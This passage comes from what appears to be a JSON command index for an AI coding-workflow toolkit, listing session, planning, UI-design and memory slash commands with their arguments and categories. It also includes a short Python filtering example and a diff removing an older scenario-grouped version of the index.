"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\\"",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
}
],
"tools": [
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\\"",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
}
],
"ui-design": [
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
]
}
}
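Consumers of this index can filter entries by category, subcategory, or usage scenario. A minimal sketch in Python, assuming the file is saved as `command.json` (the two-entry sample below stands in for the full index; the helper name `find_commands` is illustrative, not part of the published schema):

```python
import json

# Two-entry sample standing in for the full command.json index.
sample = """
{
  "workflow": {
    "_root": [
      {"name": "plan", "command": "/workflow:plan",
       "usage_scenario": "planning", "difficulty": "Intermediate"},
      {"name": "debug", "command": "/workflow:debug",
       "usage_scenario": "general", "difficulty": "Intermediate"}
    ]
  }
}
"""

index = json.loads(sample)

def find_commands(index, scenario):
    """Yield command strings whose usage_scenario matches."""
    for category in index.values():        # e.g. "workflow"
        for entries in category.values():  # e.g. "_root", "session"
            for entry in entries:
                if entry.get("usage_scenario") == scenario:
                    yield entry["command"]

print(list(find_commands(index, "planning")))  # ['/workflow:plan']
```

With the real file, replace `sample` with `open("command.json").read()`; the nested category → subcategory → entry-list shape is the same throughout.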


@@ -1,896 +0,0 @@
{
"general": [
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
"arguments": "[--tool gemini|qwen] \\\"task context description\\\"",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
],
"implementation": [
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
"arguments": "\\\"task title\\",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
}
],
"planning": [
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "workflow:ui-design:codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "workflow:ui-design:import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "workflow:ui-design:reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
}
],
"documentation": [
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
